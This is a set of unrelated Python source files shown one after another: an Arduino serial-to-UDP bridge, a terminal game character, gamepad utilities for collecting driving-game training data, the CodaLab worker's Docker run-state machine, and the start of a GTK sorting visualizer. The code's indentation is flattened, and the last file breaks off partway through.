| source | python |
|---|---|
SerialUDPBridge.py
|
import serial #Serial port API http://pyserial.sourceforge.net/pyserial_api.html
import socket
import time
from threading import Thread
def recvUDP(sock,SerialIOArduino):
while True:
        data, addr = sock.recvfrom(1280)  # Max receive size is 1280 bytes
print "UDP received message:", data.strip()
SerialIOArduino.write(data)
port = "/dev/ttyACM0"
UDP_IP = "127.0.0.1"
UDP_PORT = 9050
print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT
sock = socket.socket(socket.AF_INET, # Internet protocol
socket.SOCK_DGRAM) # User Datagram (UDP)
sock.bind(("0.0.0.0", UDP_PORT)) # Listen on all adapters
SerialIOArduino = serial.Serial(port, 9600)  # set up the serial port and baud rate
SerialIOArduino.flushInput()  # Flush any stale input
t = Thread(target=recvUDP,args=(sock,SerialIOArduino,))
t.daemon=True # Stop thread when program ends
t.start()
while True:
if (SerialIOArduino.inWaiting() > 0):
        inputLine = SerialIOArduino.readline().strip()  # read a '\n'-terminated line
        # Send the CSV string as a UDP message
sock.sendto(inputLine, (UDP_IP, UDP_PORT))
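# A minimal, hypothetical way to exercise this bridge from another shell (the
# payload below is only illustrative; the port matches UDP_PORT above):
#   python -c "import socket; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.sendto('1,2,3\n', ('127.0.0.1', 9050))"
# Anything received on UDP port 9050 is written to the Arduino over serial, and
# '\n'-terminated lines read back from the serial port are sent out as UDP datagrams.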
|
character.py
|
from collections import deque
from threading import Thread
from blessed import Terminal
from pynput.keyboard import Key, Listener
from .abstractdungeonentity import AbstractDungeonEntity
term = Terminal()
class Character(AbstractDungeonEntity):
"""This describes a character"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.ENTITY_TYPE = "character"
self.playing = True
self.commands = deque()
self.health = 100
def press(self, key: Key) -> None:
"""Reads keyboard input"""
self.new_positions = {"x": 0, "y": 0}
try:
if key.char == 'a':
self.new_positions["x"] = -1
if key.char == 'd':
self.new_positions["x"] = 1
if key.char == 'w':
self.new_positions["y"] = -1
if key.char == 's':
self.new_positions["y"] = 1
except AttributeError:
self.playing = False
def release(self, key: Key) -> bool:
"""On key release"""
try:
if key.char == 'p':
self.playing = False
except AttributeError:
pass
return False
def keyboard_input(self) -> None:
"""Uses listener that reads keyboard input from press"""
with Listener(on_press=self.press, on_release=self.release) as listener: # set keys to be read immediately
listener.join()
def move(self, direction: str) -> None:
"""Move player"""
if direction == 'a':
self.new_positions["x"] = -1
if direction == 'd':
self.new_positions["x"] = 1
if direction == 'w':
self.new_positions["y"] = -1
if direction == 's':
self.new_positions["y"] = 1
if direction == 'p':
self.playing = False
def start(self) -> None:
"""Start thread"""
Thread(target=self.control, args=()).start()
def control(self) -> None:
"""Get keyboard controls"""
while self.playing:
with term.cbreak(): # set keys to be read immediately
inp = term.inkey() # wait and read one character
self.commands.append(inp)
def update(self) -> None:
"""Turn based update"""
command = ""
while len(command) == 0:
if len(self.commands) > 0:
command = (self.commands.pop())
self.move(command)
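    # Typical flow, as implied by the methods above: call start() so control()
    # queues keypresses from a background thread, then call update() once per
    # turn; update() waits until a command is available and applies it via move().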
|
utils.py
|
#!/usr/bin/env python
import sys
import array
import numpy as np
from skimage.color import rgb2gray
from skimage.transform import resize
from skimage.io import imread
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from inputs import get_gamepad
import math
import threading
def resize_image(img):
im = resize(img, (Sample.IMG_H, Sample.IMG_W, Sample.IMG_D))
im_arr = im.reshape((Sample.IMG_H, Sample.IMG_W, Sample.IMG_D))
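    # resize() already returns an array of shape (IMG_H, IMG_W, IMG_D), so this
    # reshape is effectively a no-op kept as a shape safeguard.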
return im_arr
class Screenshot(object):
# PS Remote Play = (0,40,960,560)
# Emulator = (0,60,640,480)
SRC_W = 960
SRC_H = 560
SRC_D = 3
OFFSET_X = 0
OFFSET_Y = 40
class Sample:
IMG_W = 200
IMG_H = 66
IMG_D = 3
class Controller(object):
MAX_TRIG_VAL = math.pow(2, 8)
MAX_JOY_VAL = math.pow(2, 15)
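    # Raw gamepad events report triggers as 8-bit values (0..255) and stick axes
    # as signed 16-bit values (-32768..32767); dividing by 2**8 and 2**15 below
    # normalizes them to roughly [0, 1) and [-1, 1) respectively.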
def __init__(self):
self.LeftJoystickY = 0
self.LeftJoystickX = 0
self.RightJoystickY = 0
self.RightJoystickX = 0
self.LeftTrigger = 0
self.RightTrigger = 0
self.LeftBumper = 0
self.RightBumper = 0
self.A = 0
self.X = 0
self.Y = 0
self.B = 0
self.LeftThumb = 0
self.RightThumb = 0
self.Back = 0
self.Start = 0
self.LeftDPad = 0
self.RightDPad = 0
self.UpDPad = 0
self.DownDPad = 0
self._monitor_thread = threading.Thread(target=self.monitor_controller, args=())
self._monitor_thread.daemon = True
self._monitor_thread.start()
# def read(self):
# x = self.LeftJoystickX
# y = self.LeftJoystickY
# a = self.A
# b = self.X # b=1, x=2
# rb = self.RightBumper
# return [x, y, a, b, rb]
# GTA/Need for Speed
def read(self):
x = self.LeftJoystickX
r = self.RightTrigger
l = self.LeftTrigger
a = self.A
b = self.Y
return [x, r, l, a, b]
def monitor_controller(self):
while True:
events = get_gamepad()
for event in events:
if event.code == 'ABS_Y':
self.LeftJoystickY = event.state / Controller.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_X':
self.LeftJoystickX = event.state / Controller.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_RY':
self.RightJoystickY = event.state / Controller.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_RX':
self.RightJoystickX = event.state / Controller.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_Z':
self.LeftTrigger = event.state / Controller.MAX_TRIG_VAL # normalize between 0 and 1
elif event.code == 'ABS_RZ':
self.RightTrigger = event.state / Controller.MAX_TRIG_VAL # normalize between 0 and 1
elif event.code == 'BTN_TL':
self.LeftBumper = event.state
elif event.code == 'BTN_TR':
self.RightBumper = event.state
elif event.code == 'BTN_SOUTH':
self.A = event.state
elif event.code == 'BTN_NORTH':
self.X = event.state
elif event.code == 'BTN_WEST':
self.Y = event.state
elif event.code == 'BTN_EAST':
self.B = event.state
elif event.code == 'BTN_THUMBL':
self.LeftThumb = event.state
elif event.code == 'BTN_THUMBR':
self.RightThumb = event.state
elif event.code == 'BTN_SELECT':
self.Back = event.state
elif event.code == 'BTN_START':
self.Start = event.state
elif event.code == 'BTN_TRIGGER_HAPPY1':
self.LeftDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY2':
self.RightDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY3':
self.UpDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY4':
self.DownDPad = event.state
class Data(object):
def __init__(self):
self._X = np.load("data/X.npy")
self._y = np.load("data/y.npy")
self._epochs_completed = 0
self._index_in_epoch = 0
self._num_examples = self._X.shape[0]
@property
def num_examples(self):
return self._num_examples
def next_batch(self, batch_size):
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Start next epoch
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._X[start:end], self._y[start:end]
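    # Hypothetical usage sketch (assumes data/X.npy and data/y.npy exist, as
    # written by prepare() below):
    #   data = Data()
    #   for _ in range(data.num_examples // 64):
    #       X_batch, y_batch = data.next_batch(64)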
def load_sample(sample):
image_files = np.loadtxt(sample + '/data.csv', delimiter=',', dtype=str, usecols=(0,))
joystick_values = np.loadtxt(sample + '/data.csv', delimiter=',', usecols=(1,2,3,4,5))
return image_files, joystick_values
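# Each row of <sample>/data.csv is expected to contain an image path in column 0
# followed by five controller values in columns 1-5 (the layout Controller.read() produces).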
# training data viewer
def viewer(sample):
image_files, joystick_values = load_sample(sample)
plotData = []
plt.ion()
plt.figure('viewer', figsize=(16, 6))
for i in range(len(image_files)):
# joystick
print(i, " ", joystick_values[i,:])
# format data
plotData.append( joystick_values[i,:] )
if len(plotData) > 30:
plotData.pop(0)
x = np.asarray(plotData)
# image (every 3rd)
if (i % 3 == 0):
plt.subplot(121)
image_file = image_files[i]
img = mpimg.imread(image_file)
plt.imshow(img)
# plot
plt.subplot(122)
plt.plot(range(i,i+len(plotData)), x[:,0], 'r')
# plt.hold(True)
plt.plot(range(i,i+len(plotData)), x[:,1], 'b')
plt.plot(range(i,i+len(plotData)), x[:,2], 'g')
plt.plot(range(i,i+len(plotData)), x[:,3], 'k')
plt.plot(range(i,i+len(plotData)), x[:,4], 'y')
plt.draw()
# plt.hold(False)
plt.pause(0.0001) # seconds
i += 1
# prepare training data
def prepare(samples):
print("Preparing data")
X = []
y = []
for sample in samples:
print(sample)
# load sample
image_files, joystick_values = load_sample(sample)
# add joystick values to y
y.append(joystick_values)
# load, prepare and add images to X
for image_file in image_files:
image = imread(image_file)
vec = resize_image(image)
X.append(vec)
print("Saving to file...")
X = np.asarray(X)
y = np.concatenate(y)
np.save("data/X", X)
np.save("data/y", y)
print("Done!")
return
if __name__ == '__main__':
if sys.argv[1] == 'viewer':
viewer(sys.argv[2])
elif sys.argv[1] == 'prepare':
prepare(sys.argv[2:])
|
worker_run_state.py
|
import docker
import glob
import logging
import os
import threading
import time
import traceback
import codalab.worker.docker_utils as docker_utils
from collections import namedtuple
from pathlib import Path
from codalab.lib.formatting import size_str, duration_str
from codalab.worker.file_util import remove_path, get_path_size, path_is_parent
from codalab.worker.bundle_state import State, DependencyKey
from codalab.worker.fsm import DependencyStage, StateTransitioner
from codalab.worker.worker_thread import ThreadDict
logger = logging.getLogger(__name__)
class RunStage(object):
"""
    Defines the finite set of possible stages and transition functions.
Note that it is important that each state be able to be re-executed
without unintended adverse effects (which happens upon worker resume)
"""
WORKER_STATE_TO_SERVER_STATE = {}
"""
This stage involves setting up the directory structure for the run
and preparing to start the container
"""
PREPARING = 'RUN_STAGE.PREPARING'
WORKER_STATE_TO_SERVER_STATE[PREPARING] = State.PREPARING
"""
Running encompasses the state where the user's job is running
"""
RUNNING = 'RUN_STAGE.RUNNING'
WORKER_STATE_TO_SERVER_STATE[RUNNING] = State.RUNNING
"""
This stage encompasses cleaning up intermediary components like
the dependency symlinks and also the releasing of dependencies
"""
CLEANING_UP = 'RUN_STAGE.CLEANING_UP'
WORKER_STATE_TO_SERVER_STATE[CLEANING_UP] = State.RUNNING
"""
Uploading results means the job's results are getting uploaded to the server
"""
UPLOADING_RESULTS = 'RUN_STAGE.UPLOADING_RESULTS'
WORKER_STATE_TO_SERVER_STATE[UPLOADING_RESULTS] = State.RUNNING
"""
Finalizing means the worker is finalizing the bundle metadata with the server
"""
FINALIZING = 'RUN_STAGE.FINALIZING'
WORKER_STATE_TO_SERVER_STATE[FINALIZING] = State.FINALIZING
"""
Finished means the worker is done with this run
"""
FINISHED = 'RUN_STAGE.FINISHED'
WORKER_STATE_TO_SERVER_STATE[FINISHED] = State.READY
"""
This stage will collect bundles in terminal states and
    send them back to the server in the RESTAGED state
"""
RESTAGED = 'RUN_STAGE.RESTAGED'
WORKER_STATE_TO_SERVER_STATE[RESTAGED] = State.STAGED
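    # Typical progression (see the transitions registered in RunStateMachine below):
    # PREPARING -> RUNNING -> CLEANING_UP -> UPLOADING_RESULTS -> FINALIZING -> FINISHED,
    # with RESTAGED as the other terminal stage for bundles sent back to the server.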
RunState = namedtuple(
'RunState',
[
'stage', # RunStage
'run_status', # str
'bundle', # BundleInfo
'bundle_path', # str
'bundle_dir_wait_num_tries', # Optional[int]
'resources', # RunResources
'bundle_start_time', # int
'container_time_total', # int
'container_time_user', # int
'container_time_system', # int
'container', # Optional[docker.Container]
'container_id', # Optional[str]
'docker_image', # Optional[str]
'is_killed', # bool
'has_contents', # bool
'cpuset', # Optional[Set[str]]
'gpuset', # Optional[Set[str]]
'max_memory', # int
'disk_utilization', # int
        'exitcode',  # Optional[str]
'failure_message', # Optional[str]
'kill_message', # Optional[str]
'finished', # bool
'finalized', # bool
'is_restaged', # bool
'cpu_usage', # float
'memory_limit', # int
],
)
"""Dependency that is mounted.
TODO(Ashwin): document this better
docker_path - path on the Docker container where the dependency is mounted
example (shared file system): /0x0fbb927dc0e54544bbc2d439a6805951/foo
example (non-shared file system): .../codalab-worksheets/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af
child_path - path inside the bundle folder from where the dependency is mounted
example (shared file system): .../codalab-worksheets/var/codalab/home/partitions/default/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo
example (non-shared file system): .../codalab-worksheets/var/codalab/home/partitions/default/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo
parent_path - path of the dependency
example (shared file system): /opt/codalab-worksheets/tests/files/a.txt
example (non-shared file system): .../codalab-worksheets/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af
"""
DependencyToMount = namedtuple('DependencyToMount', 'docker_path, child_path, parent_path')
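# Purely illustrative value, reusing the example paths from the docstring above
# (shared-file-system case):
#   DependencyToMount(
#       docker_path='/0x0fbb927dc0e54544bbc2d439a6805951/foo',
#       child_path='.../bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo',
#       parent_path='/opt/codalab-worksheets/tests/files/a.txt',
#   )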
class RunStateMachine(StateTransitioner):
"""
    Manages the state machine of the runs running on the local machine.
Note that in general there are two types of errors:
- User errors (fault of bundle) - we fail the bundle (move to CLEANING_UP state).
- System errors (fault of worker) - we freeze this worker (Exception is thrown up).
It's not always clear where the line is.
"""
_ROOT = '/'
_CURRENT_DIRECTORY = '.'
def __init__(
self,
docker_image_manager, # Component to request docker images from
dependency_manager, # Component to request dependency downloads from
worker_docker_network, # Docker network to add all bundles to
docker_network_internal, # Docker network to add non-net connected bundles to
docker_network_external, # Docker network to add internet connected bundles to
docker_runtime, # Docker runtime to use for containers (nvidia or runc)
upload_bundle_callback, # Function to call to upload bundle results to the server
assign_cpu_and_gpu_sets_fn, # Function to call to assign CPU and GPU resources to each run
shared_file_system, # If True, bundle mount is shared with server
):
super(RunStateMachine, self).__init__()
self.add_transition(RunStage.PREPARING, self._transition_from_PREPARING)
self.add_transition(RunStage.RUNNING, self._transition_from_RUNNING)
self.add_transition(RunStage.CLEANING_UP, self._transition_from_CLEANING_UP)
self.add_transition(RunStage.UPLOADING_RESULTS, self._transition_from_UPLOADING_RESULTS)
self.add_transition(RunStage.FINALIZING, self._transition_from_FINALIZING)
self.add_terminal(RunStage.FINISHED)
self.add_terminal(RunStage.RESTAGED)
self.dependency_manager = dependency_manager
self.docker_image_manager = docker_image_manager
self.worker_docker_network = worker_docker_network
self.docker_network_external = docker_network_external
self.docker_network_internal = docker_network_internal
self.docker_runtime = docker_runtime
# bundle.uuid -> {'thread': Thread, 'run_status': str}
self.uploading = ThreadDict(fields={'run_status': 'Upload started', 'success': False})
# bundle.uuid -> {'thread': Thread, 'disk_utilization': int, 'running': bool}
self.disk_utilization = ThreadDict(
fields={'disk_utilization': 0, 'running': True, 'lock': None}
)
self.upload_bundle_callback = upload_bundle_callback
self.assign_cpu_and_gpu_sets_fn = assign_cpu_and_gpu_sets_fn
self.shared_file_system = shared_file_system
self.paths_to_remove = []
def stop(self):
for uuid in self.disk_utilization.keys():
self.disk_utilization[uuid]['running'] = False
self.disk_utilization.stop()
self.uploading.stop()
def _transition_from_PREPARING(self, run_state):
"""
        1- Request the docker image from the docker image manager
            - if the image has failed, move to CLEANING_UP state
        2- Request the dependencies from the dependency manager
            - if any dependency has failed, move to CLEANING_UP state
3- If all dependencies and docker image are ready:
- Set up the local filesystem for the run
- Create symlinks to dependencies
- Allocate resources and prepare the docker container
- Start the docker container
4- If all is successful, move to RUNNING state
"""
def mount_dependency(dependency, shared_file_system):
if not shared_file_system:
# Set up symlinks for the content at dependency path
Path(dependency.child_path).parent.mkdir(parents=True, exist_ok=True)
os.symlink(dependency.docker_path, dependency.child_path)
# The following will be converted into a Docker volume binding like:
# dependency_path:docker_dependency_path:ro
docker_dependencies.append((dependency.parent_path, dependency.docker_path))
if run_state.is_killed or run_state.is_restaged:
return run_state._replace(stage=RunStage.CLEANING_UP)
# Check CPU and GPU availability
try:
cpuset, gpuset = self.assign_cpu_and_gpu_sets_fn(
run_state.resources.cpus, run_state.resources.gpus
)
except Exception as e:
message = "Unexpectedly unable to assign enough resources to bundle {}: {}".format(
run_state.bundle.uuid, str(e)
)
logger.error(message)
logger.error(traceback.format_exc())
return run_state._replace(run_status=message)
dependencies_ready = True
status_messages = []
if not self.shared_file_system:
# No need to download dependencies if we're in the shared FS,
# since they're already in our FS
for dep in run_state.bundle.dependencies:
dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)
dependency_state = self.dependency_manager.get(run_state.bundle.uuid, dep_key)
if dependency_state.stage == DependencyStage.DOWNLOADING:
status_messages.append(
'Downloading dependency %s: %s done (archived size)'
% (dep.child_path, size_str(dependency_state.size_bytes))
)
dependencies_ready = False
elif dependency_state.stage == DependencyStage.FAILED:
# Failed to download dependency; -> CLEANING_UP
return run_state._replace(
stage=RunStage.CLEANING_UP,
failure_message='Failed to download dependency %s: %s'
% (dep.child_path, dependency_state.message),
)
# get the docker image
docker_image = run_state.resources.docker_image
image_state = self.docker_image_manager.get(docker_image)
if image_state.stage == DependencyStage.DOWNLOADING:
status_messages.append(
'Pulling docker image: ' + (image_state.message or docker_image or "")
)
dependencies_ready = False
elif image_state.stage == DependencyStage.FAILED:
# Failed to pull image; -> CLEANING_UP
message = 'Failed to download Docker image: %s' % image_state.message
logger.error(message)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
# stop proceeding if dependency and image downloads aren't all done
if not dependencies_ready:
status_message = status_messages.pop()
if status_messages:
                status_message += " (and downloading %d other dependencies and docker images)" % len(
status_messages
)
return run_state._replace(run_status=status_message)
# All dependencies ready! Set up directories, symlinks and container. Start container.
# 1) Set up a directory to store the bundle.
if self.shared_file_system:
if not os.path.exists(run_state.bundle_path):
if run_state.bundle_dir_wait_num_tries == 0:
message = (
"Bundle directory cannot be found on the shared filesystem. "
"Please ensure the shared fileystem between the server and "
"your worker is mounted properly or contact your administrators."
)
logger.error(message)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
return run_state._replace(
run_status="Waiting for bundle directory to be created by the server",
bundle_dir_wait_num_tries=run_state.bundle_dir_wait_num_tries - 1,
)
else:
remove_path(run_state.bundle_path)
os.makedirs(run_state.bundle_path)
# 2) Set up symlinks
docker_dependencies = []
docker_dependencies_path = (
RunStateMachine._ROOT
+ run_state.bundle.uuid
+ ('_dependencies' if not self.shared_file_system else '')
)
for dep in run_state.bundle.dependencies:
full_child_path = os.path.normpath(os.path.join(run_state.bundle_path, dep.child_path))
to_mount = []
dependency_path = self._get_dependency_path(run_state, dep)
if dep.child_path == RunStateMachine._CURRENT_DIRECTORY:
# Mount all the content of the dependency_path to the top-level of the bundle
for child in os.listdir(dependency_path):
child_path = os.path.normpath(os.path.join(run_state.bundle_path, child))
to_mount.append(
DependencyToMount(
docker_path=os.path.join(docker_dependencies_path, child),
child_path=child_path,
parent_path=os.path.join(dependency_path, child),
)
)
self.paths_to_remove.append(child_path)
else:
to_mount.append(
DependencyToMount(
docker_path=os.path.join(docker_dependencies_path, dep.child_path),
child_path=full_child_path,
parent_path=dependency_path,
)
)
first_element_of_path = Path(dep.child_path).parts[0]
if first_element_of_path == RunStateMachine._ROOT:
self.paths_to_remove.append(full_child_path)
else:
# child_path can be a nested path, so later remove everything from the first element of the path
self.paths_to_remove.append(
os.path.join(run_state.bundle_path, first_element_of_path)
)
for dependency in to_mount:
try:
mount_dependency(dependency, self.shared_file_system)
except OSError as e:
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=str(e))
if run_state.resources.network:
docker_network = self.docker_network_external.name
else:
docker_network = self.docker_network_internal.name
# 3) Start container
try:
container = docker_utils.start_bundle_container(
run_state.bundle_path,
run_state.bundle.uuid,
docker_dependencies,
run_state.bundle.command,
run_state.resources.docker_image,
network=docker_network,
cpuset=cpuset,
gpuset=gpuset,
memory_bytes=run_state.resources.memory,
runtime=self.docker_runtime,
)
self.worker_docker_network.connect(container)
except docker_utils.DockerUserErrorException as e:
message = 'Cannot start Docker container: {}'.format(e)
logger.warning(message)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
except Exception as e:
message = 'Cannot start Docker container: {}'.format(e)
logger.error(message)
logger.error(traceback.format_exc())
raise
return run_state._replace(
stage=RunStage.RUNNING,
run_status='Running job in Docker container',
container_id=container.id,
container=container,
docker_image=image_state.digest,
has_contents=True,
cpuset=cpuset,
gpuset=gpuset,
)
def _get_dependency_path(self, run_state, dependency):
if self.shared_file_system:
# TODO(Ashwin): make this not fs-specific.
# On a shared FS, we know where the dependency is stored and can get the contents directly
return os.path.realpath(os.path.join(dependency.location, dependency.parent_path))
else:
# On a dependency_manager setup, ask the manager where the dependency is
dep_key = DependencyKey(dependency.parent_uuid, dependency.parent_path)
return os.path.join(
self.dependency_manager.dependencies_dir,
self.dependency_manager.get(run_state.bundle.uuid, dep_key).path,
)
def _transition_from_RUNNING(self, run_state):
"""
1- Check run status of the docker container
2- If run is killed, kill the container
3- If run is finished, move to CLEANING_UP state
"""
def check_and_report_finished(run_state):
try:
finished, exitcode, failure_msg = docker_utils.check_finished(run_state.container)
except docker_utils.DockerException:
logger.error(traceback.format_exc())
finished, exitcode, failure_msg = False, None, None
return run_state._replace(
finished=finished, exitcode=exitcode, failure_message=failure_msg
)
def check_resource_utilization(run_state: RunState):
cpu_usage, memory_limit = docker_utils.get_container_stats_with_docker_stats(
run_state.container
)
run_state = run_state._replace(cpu_usage=cpu_usage)
run_state = run_state._replace(memory_limit=memory_limit)
kill_messages = []
run_stats = docker_utils.get_container_stats(run_state.container)
run_state = run_state._replace(
max_memory=max(run_state.max_memory, run_stats.get('memory', 0))
)
run_state = run_state._replace(
disk_utilization=self.disk_utilization[run_state.bundle.uuid]['disk_utilization']
)
container_time_total = docker_utils.get_container_running_time(run_state.container)
run_state = run_state._replace(
container_time_total=container_time_total,
container_time_user=run_stats.get(
'container_time_user', run_state.container_time_user
),
container_time_system=run_stats.get(
'container_time_system', run_state.container_time_system
),
)
if run_state.resources.time and container_time_total > run_state.resources.time:
kill_messages.append(
'Time limit exceeded. (Container uptime %s > time limit %s)'
% (duration_str(container_time_total), duration_str(run_state.resources.time))
)
if run_state.max_memory > run_state.resources.memory or run_state.exitcode == 137:
kill_messages.append(
'Memory limit %s exceeded.' % size_str(run_state.resources.memory)
)
if run_state.resources.disk and run_state.disk_utilization > run_state.resources.disk:
kill_messages.append(
'Disk limit %sb exceeded.' % size_str(run_state.resources.disk)
)
if kill_messages:
run_state = run_state._replace(kill_message=' '.join(kill_messages), is_killed=True)
return run_state
def check_disk_utilization():
running = True
while running:
start_time = time.time()
try:
disk_utilization = get_path_size(run_state.bundle_path)
self.disk_utilization[run_state.bundle.uuid][
'disk_utilization'
] = disk_utilization
running = self.disk_utilization[run_state.bundle.uuid]['running']
except Exception:
logger.error(traceback.format_exc())
end_time = time.time()
# To ensure that we don't hammer the disk for this computation when
# there are lots of files, we run it at most 10% of the time.
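                # (e.g. a scan that took 3 seconds is followed by a 30-second
                # sleep, with a 1-second floor)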
time.sleep(max((end_time - start_time) * 10, 1.0))
self.disk_utilization.add_if_new(
run_state.bundle.uuid, threading.Thread(target=check_disk_utilization, args=[])
)
run_state = check_and_report_finished(run_state)
run_state = check_resource_utilization(run_state)
if run_state.is_killed or run_state.is_restaged:
if docker_utils.container_exists(run_state.container):
try:
run_state.container.kill()
except docker.errors.APIError:
finished, _, _ = docker_utils.check_finished(run_state.container)
if not finished:
logger.error(traceback.format_exc())
self.disk_utilization[run_state.bundle.uuid]['running'] = False
self.disk_utilization.remove(run_state.bundle.uuid)
return run_state._replace(stage=RunStage.CLEANING_UP)
if run_state.finished:
logger.debug(
'Finished run with UUID %s, exitcode %s, failure_message %s',
run_state.bundle.uuid,
run_state.exitcode,
run_state.failure_message,
)
self.disk_utilization[run_state.bundle.uuid]['running'] = False
self.disk_utilization.remove(run_state.bundle.uuid)
return run_state._replace(stage=RunStage.CLEANING_UP, run_status='Uploading results')
else:
return run_state
def _transition_from_CLEANING_UP(self, run_state):
"""
1- delete the container if still existent
2- clean up the dependencies from bundle directory
3- release the dependencies in dependency manager
4- If bundle has contents to upload (i.e. was RUNNING at some point),
move to UPLOADING_RESULTS state
Otherwise move to FINALIZING state
"""
def remove_path_no_fail(path):
try:
remove_path(path)
except Exception:
logger.error(traceback.format_exc())
if run_state.container_id is not None:
while docker_utils.container_exists(run_state.container):
try:
finished, _, _ = docker_utils.check_finished(run_state.container)
if finished:
run_state.container.remove(force=True)
run_state = run_state._replace(container=None, container_id=None)
break
else:
try:
run_state.container.kill()
except docker.errors.APIError:
logger.error(traceback.format_exc())
time.sleep(1)
except docker.errors.APIError:
logger.error(traceback.format_exc())
time.sleep(1)
for dep in run_state.bundle.dependencies:
if not self.shared_file_system: # No dependencies if shared fs worker
dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)
self.dependency_manager.release(run_state.bundle.uuid, dep_key)
# Clean up dependencies paths
for path in self.paths_to_remove:
remove_path_no_fail(path)
self.paths_to_remove = []
if run_state.is_restaged:
return run_state._replace(stage=RunStage.RESTAGED)
if not self.shared_file_system and run_state.has_contents:
return run_state._replace(
stage=RunStage.UPLOADING_RESULTS, run_status='Uploading results', container=None
)
else:
# No need to upload results since results are directly written to bundle store
            # Delete any files that match the exclude_patterns.
for exclude_pattern in run_state.bundle.metadata["exclude_patterns"]:
full_pattern = os.path.join(run_state.bundle_path, exclude_pattern)
for file_path in glob.glob(full_pattern, recursive=True):
# Only remove files that are subpaths of run_state.bundle_path, in case
# that exclude_pattern is something like "../../../".
if path_is_parent(parent_path=run_state.bundle_path, child_path=file_path):
remove_path(file_path)
return self.finalize_run(run_state)
def _transition_from_UPLOADING_RESULTS(self, run_state):
"""
If bundle not already uploading:
Use the RunManager API to upload contents at bundle_path to the server
Pass the callback to that API such that if the bundle is killed during the upload,
the callback returns false, allowing killable uploads.
If uploading and not finished:
Update run_status with upload progress
If uploading and finished:
Move to FINALIZING state
"""
if run_state.is_restaged:
return run_state._replace(stage=RunStage.RESTAGED)
def upload_results():
try:
# Upload results
logger.debug('Uploading results for run with UUID %s', run_state.bundle.uuid)
def progress_callback(bytes_uploaded):
run_status = 'Uploading results: %s done (archived size)' % size_str(
bytes_uploaded
)
self.uploading[run_state.bundle.uuid]['run_status'] = run_status
return True
self.upload_bundle_callback(
run_state.bundle.uuid,
run_state.bundle_path,
run_state.bundle.metadata["exclude_patterns"],
progress_callback,
)
self.uploading[run_state.bundle.uuid]['success'] = True
except Exception as e:
self.uploading[run_state.bundle.uuid]['run_status'] = (
"Error while uploading: %s" % e
)
logger.error(traceback.format_exc())
self.uploading.add_if_new(
run_state.bundle.uuid, threading.Thread(target=upload_results, args=[])
)
if self.uploading[run_state.bundle.uuid].is_alive():
return run_state._replace(
run_status=self.uploading[run_state.bundle.uuid]['run_status']
)
elif not self.uploading[run_state.bundle.uuid]['success']:
# upload failed
failure_message = run_state.failure_message
if failure_message:
run_state = run_state._replace(
failure_message=(
failure_message + '. ' + self.uploading[run_state.bundle.uuid]['run_status']
)
)
else:
run_state = run_state._replace(
failure_message=self.uploading[run_state.bundle.uuid]['run_status']
)
self.uploading.remove(run_state.bundle.uuid)
return self.finalize_run(run_state)
def finalize_run(self, run_state):
"""
Prepare the finalize message to be sent with the next checkin
"""
if run_state.is_killed:
# Append kill_message, which contains more useful info on why a run was killed, to the failure message.
failure_message = (
"{}. {}".format(run_state.failure_message, run_state.kill_message)
if run_state.failure_message
else run_state.kill_message
)
run_state = run_state._replace(failure_message=failure_message)
return run_state._replace(stage=RunStage.FINALIZING, run_status="Finalizing bundle")
def _transition_from_FINALIZING(self, run_state):
"""
        If a full worker cycle has passed since we entered the FINALIZING state, we have already
        reported to the server. If the bundle is going to be sent back to the server, move on to
        the RESTAGED state. Otherwise, move on to the FINISHED state. bundle_path can also be
        removed now.
"""
if run_state.is_restaged:
return run_state._replace(stage=RunStage.RESTAGED)
elif run_state.finalized:
if not self.shared_file_system:
remove_path(run_state.bundle_path) # don't remove bundle if shared FS
return run_state._replace(stage=RunStage.FINISHED, run_status='Finished')
else:
return run_state
|
gui.py
|
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from algorithms import *
import threading
algsSwitcher = {
0: bubblesort,
1: countingsort,
2: insertionsort,
3: radixsort,
4: quicksort,
5: bogosort
}
listToSort = []
# addl indices:
# 0. speed, 1. change count, 2. thread stopping event,
# 3. who's setting the event? (True = refrBtn, False = algsCombo),
# 4. digit for bubble and countingsort single-digit mode (used for radixsort, 0 = off),
# 5. radix sort subroutine, 6. bar order (True = descending, False = random)
addl = [60, 0, threading.Event(), False, 0, countingsort, False]
sortingThread = threading.Thread()
class Application(Gtk.Application):
def __init__(self):
Gtk.Application.__init__(self, application_id="io.github.furtarball.gtk-sortvis")
self.handlers = {
"onStartClick": self.start_on_click,
"onRefrClick": self.refr_on_click,
"onAlgSwitch": self.algs_on_change,
"onConfigure": self.on_configure, # on window size change
"onDraw": self.on_draw,
"onToggle": self.on_setting_change
}
self.builder = Gtk.Builder.new_from_file("sortwindow.ui")
def do_activate(self):
self.window = self.builder.get_object("sortWindow")
self.startBtn = self.builder.get_object("startBtn")
self.refrBtn = self.builder.get_object("refrBtn")
self.algsCombo = self.builder.get_object("algsCombo")
self.barWidthSBtn = self.builder.get_object("barWidthSBtn")
self.gapsToggle = self.builder.get_object("gapsToggle")
self.fillToggle = self.builder.get_object("fillToggle")
self.speedSBtn = self.builder.get_object("speedSBtn")
